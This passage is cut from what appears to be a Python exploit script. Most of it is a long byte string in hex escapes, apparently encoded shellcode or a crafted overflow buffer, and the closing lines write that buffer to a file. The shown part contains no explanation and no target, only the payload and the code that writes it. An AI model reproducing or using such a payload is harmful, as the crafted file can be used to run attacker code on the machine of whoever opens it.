 "\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b"
 "\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4"
 "\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5"
 "\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1"
 "\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16"
 "\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51"
 "\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3"
 "\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06"
 "\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49"
 "\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65"
 "\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf"
 "\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb"
 "\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba"
 "\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08"
 "\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b"
 "\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c"
 "\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")
 file.write(buffer)
 file.close()